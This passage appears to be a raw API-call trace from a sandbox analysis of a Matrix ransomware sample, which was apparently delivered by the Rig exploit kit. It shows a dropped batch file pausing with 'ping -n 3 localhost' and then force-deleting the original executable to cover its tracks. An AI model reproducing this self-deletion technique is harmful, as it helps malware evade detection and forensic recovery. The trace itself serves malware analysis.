lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0xffffffff [0094.201] GetLastError () returned 0x2 [0094.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb28) returned 0x1dfdd0 [0094.201] FindClose (in: hFindFile=0x1dfdd0 | out: hFindFile=0x1dfdd0) returned 1 [0094.201] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.201] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.201] GetConsoleTitleW (in: lpConsoleTitle=0x18f020, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.201] InitializeProcThreadAttributeList (in: lpAttributeList=0x18eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ef70 | out: lpAttributeList=0x18eea8, lpSize=0x18ef70) returned 1 [0094.202] UpdateProcThreadAttribute (in: lpAttributeList=0x18eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18eea8, lpPreviousValue=0x0) returned 1 [0094.202] GetStartupInfoW (in: lpStartupInfo=0x18ee64 | out: lpStartupInfo=0x18ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.202] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0094.203] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef50 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x18ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xb3c, dwThreadId=0xb40)) returned 1 [0094.533] CloseHandle (hObject=0x58) returned 1 [0094.533] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.533] GetEnvironmentStringsW () returned 0x1dfef8* [0094.533] FreeEnvironmentStringsW 
(penv=0x1dfef8) returned 1 [0094.533] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0100.663] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ee44 | out: lpExitCode=0x18ee44*=0x0) returned 1 [0100.663] CloseHandle (hObject=0x54) returned 1 [0100.663] _vsnwprintf (in: _Buffer=0x18ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee50 | out: _Buffer="00000000") returned 8 [0100.664] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.664] GetEnvironmentStringsW () returned 0x1dfef8* [0100.664] FreeEnvironmentStringsW (penv=0x1dfef8) returned 1 [0100.664] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.664] GetEnvironmentStringsW () returned 0x1dfef8* [0100.664] FreeEnvironmentStringsW (penv=0x1dfef8) returned 1 [0100.664] DeleteProcThreadAttributeList (in: lpAttributeList=0x18eea8 | out: lpAttributeList=0x18eea8) [0100.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.664] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.664] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.664] SetConsoleInputExeNameW () returned 0x1 [0100.664] GetConsoleOutputCP () returned 0x1b5 [0100.664] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.664] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.665] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.665] 
_open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.665] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x66, lpOverlapped=0x0) returned 1 [0100.665] SetFilePointer (in: hFile=0x54, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.665] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=51, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n") returned 51 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.665] GetFileType (hFile=0x54) returned 0x1 [0100.665] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.666] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.666] _tell (_FileHandle=3) returned 72 [0100.666] _close (_FileHandle=3) returned 0 [0100.667] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] GetFileType (hFile=0x7) returned 0x2 [0100.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0100.667] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.667] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.667] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.667] GetFileType (hFile=0x7) returned 0x2 [0100.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0100.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] GetFileType (hFile=0x7) returned 0x2 [0100.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.668] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d2ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d2ea0*, lpNumberOfCharsWritten=0x18f6f0*=0x3) returned 1 [0100.668] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" /f /q 
\"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" ") returned 47 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] GetFileType (hFile=0x7) returned 0x2 [0100.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.668] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0100.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.668] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x2f) returned 1 [0100.669] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0100.669] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.669] GetFileType (hFile=0x7) returned 0x2 [0100.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.669] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0100.669] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.669] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0100.669] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0100.669] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0100.669] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0100.669] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.670] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18e0d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, 
nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e308, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0100.671] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0100.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1d0d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.671] SetErrorMode (uMode=0x0) returned 0x0 [0100.671] SetErrorMode (uMode=0x1) returned 0x0 [0100.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", nBufferLength=0x104, lpBuffer=0x18e728, lpFilePart=0x18e710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", lpFilePart=0x18e710*="2017-0~1.EXE") returned 0x25 [0100.671] SetErrorMode (uMode=0x0) returned 0x1 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.671] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0100.671] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x0, lpFindFileData=0x1e1fc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1fc4) returned 0x1d0fe8 [0100.672] DeleteFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 1 [0100.672] FindNextFileW (in: hFindFile=0x1d0fe8, lpFindFileData=0x1e1fc4 | out: lpFindFileData=0x1e1fc4) returned 0 [0100.672] GetLastError () returned 0x12 [0100.672] FindClose (in: hFindFile=0x1d0fe8 | out: hFindFile=0x1d0fe8) returned 1 [0100.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.673] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.673] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.673] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.673] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.673] SetConsoleInputExeNameW () returned 0x1 [0100.673] GetConsoleOutputCP () returned 0x1b5 [0100.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.674] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.674] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=72, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x48 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 
returned 0x48 [0100.674] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x33, lpOverlapped=0x0) returned 1 [0100.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=51, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n") returned 51 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] GetFileType (hFile=0x54) returned 0x1 [0100.674] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.674] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.675] _tell (_FileHandle=3) returned 123 [0100.675] _close (_FileHandle=3) returned 0 [0100.675] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f47c | out: _Buffer="\r\n") returned 2 [0100.675] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.675] GetFileType (hFile=0x7) returned 0x2 [0100.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f43c | out: lpMode=0x18f43c) returned 1 [0100.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.676] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f468, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f468*=0x2) returned 1 [0100.676] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.676] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x18f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.676] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x18f478 | out: _Buffer=">") 
returned 1 [0100.676] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.676] GetFileType (hFile=0x7) returned 0x2 [0100.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f440 | out: lpMode=0x18f440) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x18f46c, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x18f46c*=0x19) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] GetFileType (hFile=0x7) returned 0x2 [0100.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.677] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6c4 | out: lpMode=0x18f6c4) returned 1 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1d2ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x18f6f0, lpReserved=0x0 | out: lpBuffer=0x1d2ea0*, lpNumberOfCharsWritten=0x18f6f0*=0x3) returned 1 [0100.677] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x18f6fc | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" ") returned 47 [0100.677] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.677] GetFileType (hFile=0x7) returned 0x2 [0100.677] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.677] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6bc | out: lpMode=0x18f6bc) returned 1 [0100.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.678] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x18f6e8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f6e8*=0x2f) returned 1 [0100.678] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x18f71c | out: _Buffer="\r\n") returned 2 [0100.678] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0100.678] GetFileType (hFile=0x7) returned 0x2 [0100.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f6dc | out: lpMode=0x18f6dc) returned 1 [0100.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.678] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f708, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18f708*=0x2) returned 1 [0100.678] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0100.678] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0100.678] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0100.678] GetConsoleTitleW (in: lpConsoleTitle=0x18f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.678] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18f044 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.678] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x18e0d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.678] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e308, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e304*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0100.679] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x1d0d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.679] SetErrorMode (uMode=0x0) returned 0x0 [0100.679] SetErrorMode (uMode=0x1) returned 0x0 [0100.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", nBufferLength=0x104, lpBuffer=0x18e728, lpFilePart=0x18e710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", lpFilePart=0x18e710*="2017-0~1.EXE") returned 0x25 [0100.679] SetErrorMode (uMode=0x0) returned 0x1 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0100.679] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0100.679] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x0, lpFindFileData=0x1dff04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dff04) returned 0xffffffff [0100.679] GetLastError () returned 0x2 [0100.679] _get_osfhandle (_FileHandle=2) returned 0xb [0100.680] GetFileType (hFile=0xb) returned 0x2 [0100.680] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ed04 | out: lpMode=0x18ed04) returned 1 [0100.680] _get_osfhandle (_FileHandle=2) returned 0xb [0100.680] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed38 | out: lpConsoleScreenBufferInfo=0x18ed38) returned 1 [0100.680] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0100.680] FormatMessageW (in: dwFlags=0x1800, 
lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x18ed78 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\r\n") returned 0x36 [0100.680] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x18ed5c, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x18ed5c*=0x36) returned 1 [0100.681] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.681] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.681] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.681] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.681] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.681] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.681] SetConsoleInputExeNameW () returned 0x1 [0100.681] GetConsoleOutputCP () returned 0x1b5 [0100.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.681] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.681] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0100.682] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=123, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] ReadFile (in: 
